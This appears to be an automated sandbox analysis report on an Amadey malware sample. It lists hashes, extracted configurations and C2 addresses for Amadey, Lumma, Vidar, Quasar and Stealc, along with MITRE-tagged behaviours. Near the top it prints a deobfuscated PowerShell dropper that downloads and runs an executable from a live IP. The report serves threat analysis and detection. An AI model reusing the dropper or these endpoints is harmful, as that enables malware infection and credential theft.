amadey | 6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6

Analysis

max time kernel
51s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2025, 01:29 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
Size

1.8MB
MD5

7988ece243a744701d58da578abdf90e
SHA1

077d464f60b8c9e5bb40f26935363f263c655cd6
SHA256

6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6
SHA512

32689d3a7bcb3351c786b6683ab2d7c0fc40b7f3dadb26d21d73b38fc40898913ab70fefc1b2d497b25e9c921c5c223803f0f4de56dcd390ca1f387b25c2da28
SSDEEP

24576:wU/l6R1236C3vZHRUuHmFsl6RfGchgfAZZgLJwaBfzvEjj/AQAsX9J9Las4/2SHt:wU/13vZHRTdCGqpUHxzvIAdEMOk6S

Malware Config

Extracted

Language

ps1

Deobfuscated

1
$d = $env:temp + "NXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

1
$d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

https://wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://xcastmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://advennture.top/GKsiio

https://7targett.top/dsANGt

https://smeltingt.run/giiaus

https://ferromny.digital/gwpd

https://6castmaxw.run/ganzde

https://targett.top/dsANGt

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

Extracted

Family

vidar

Version

13.3

Botnet

11373d37b176b52c098f600f61cdf190

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 40 IoCs

stealer

resource	yara_rule
behavioral2/memory/5520-75-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-76-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-83-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-84-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-89-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-91-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-94-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-113-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-114-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-116-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-120-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-123-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-490-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-502-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-503-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-505-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-508-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-512-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-513-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-517-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-545-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-600-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-942-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-945-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-954-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-976-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-991-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-994-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-1012-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-1028-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1058-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1057-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5520-1071-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1155-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1169-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1175-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1187-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1190-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1213-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5852-1216-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral2/memory/10976-20072-0x0000000000CB0000-0x0000000001112000-memory.dmp	healer
behavioral2/memory/10976-20073-0x0000000000CB0000-0x0000000001112000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/5512-1195-0x000000000CE60000-0x000000000CFB4000-memory.dmp	family_quasar
behavioral2/memory/5512-1196-0x000000000CFE0000-0x000000000CFFA000-memory.dmp	family_quasar

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9c947054f9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
273	4608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2280	powershell.exe
2668	powershell.exe
4208	powershell.exe
2568	PowerShell.exe
2268	powershell.exe
472	powershell.exe
20832	powershell.exe
4608	powershell.exe
2536	powershell.exe
5512	powershell.exe
4744	powershell.exe
4964	powershell.exe
1896	powershell.exe
3196	powershell.exe
4440	powershell.exe
624	powershell.exe
2280	powershell.exe
9368	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 11 IoCs

flow	pid	Process
104	5420	rapes.exe
126	5420	rapes.exe
126	5420	rapes.exe
246	1276	futors.exe
246	1276	futors.exe
273	4608	powershell.exe
25	5420	rapes.exe
25	5420	rapes.exe
25	5420	rapes.exe
25	5420	rapes.exe
287	1276	futors.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
976	takeown.exe
5560	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 31 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4648	msedge.exe
20264	chrome.exe
20364	msedge.exe
24816	msedge.exe
6028	chrome.exe
5256	chrome.exe
4808	msedge.exe
5308	msedge.exe
5896	chrome.exe
20344	msedge.exe
4128	chrome.exe
5936	chrome.exe
5744	msedge.exe
3972	chrome.exe
19568	chrome.exe
20168	chrome.exe
1512	msedge.exe
18860	msedge.exe
5812	chrome.exe
5288	chrome.exe
18880	msedge.exe
20372	msedge.exe
20440	chrome.exe
4460	chrome.exe
2668	msedge.exe
2864	msedge.exe
20160	chrome.exe
2756	chrome.exe
4700	msedge.exe
5912	msedge.exe
4364	msedge.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9c947054f9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9c947054f9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 16 IoCs

pid	Process
5420	rapes.exe
1112	rapes.exe
3456	EPTwCQd.exe
2280	Rm3cVPI.exe
3232	UYpk7xI.exe
404	9c947054f9.exe
5220	FMXv4s3.exe
2176	amnew.exe
1276	futors.exe
644	apple.exe
5148	22.exe
472	22.exe
1180	5aa90d41f5.exe
5468	gron12321.exe
5244	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
1288	v7942.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	9c947054f9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5560	icacls.exe
976	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5aa90d41f5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10364360101\\5aa90d41f5.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10364370121\\am_no.cmd"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	9c947054f9.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00070000000241f0-883.dat	autoit_exe
behavioral2/files/0x000500000002315c-19905.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
13256	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
5788	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
5420	rapes.exe
1112	rapes.exe
404	9c947054f9.exe
5244	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3456 set thread context of 4972	3456	EPTwCQd.exe	97
PID 3232 set thread context of 5520	3232	UYpk7xI.exe	102
PID 5220 set thread context of 560	5220	FMXv4s3.exe	115
PID 5468 set thread context of 3880	5468	gron12321.exe	227
PID 1288 set thread context of 5852	1288	v7942.exe	238

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1496	sc.exe
2756	sc.exe
6088	sc.exe
4668	sc.exe
1856	sc.exe
3604	sc.exe
3244	sc.exe
6136	sc.exe
4632	sc.exe
5192	sc.exe
3608	sc.exe
2648	sc.exe
5996	sc.exe
5404	sc.exe
412	sc.exe
2320	sc.exe
6104	sc.exe
4544	sc.exe
5788	sc.exe
3580	sc.exe
2760	sc.exe
3960	sc.exe
1640	sc.exe
4268	sc.exe
5744	sc.exe
4364	sc.exe
4560	sc.exe
5096	sc.exe
1060	sc.exe
8	sc.exe
3924	sc.exe
5612	sc.exe
3880	sc.exe
4044	sc.exe
6092	sc.exe
5840	sc.exe
4928	sc.exe
4524	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
4460	3252	WerFault.exe	378
18136	11624	WerFault.exe	558
18108	11320	WerFault.exe	557
25008	18072	WerFault.exe	566
10820	12492	WerFault.exe	628

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5aa90d41f5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempNXU4DHE3AACKUKPPOKTRV8U7NPCGRFJZ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9c947054f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
